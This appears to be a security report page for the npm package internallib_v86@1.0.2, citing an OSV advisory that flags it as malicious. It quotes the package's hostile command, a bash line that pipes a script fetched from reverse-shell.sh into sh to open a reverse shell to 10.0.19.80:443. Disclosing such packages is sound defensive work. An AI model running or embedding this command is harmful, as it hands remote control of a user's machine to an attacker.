OpenSSF/OSV advisory MAL-2026-17634 confirms this npm version as malicious. internallib_v86 ships a tiny index.js that exports a function `command` which invokes `/bin/bash -c "curl https://reverse-shell.sh/... | sh"` targeting 10.0.19.80:443. Any consumer that requires the package and calls the exported function causes the installer's host to fetch a reverse-shell script from reverse-shell.sh and pipe it to a shell, giving an interactive remote shell on the installer to whoever controls...
This report applies to internallib_v86@1.0.2.
See version security history for other recorded verdicts.
Evidence last updated: .
Source advisory published: .
This report uses published external intelligence. The advisory does not provide a separate source-code analysis for each listed version.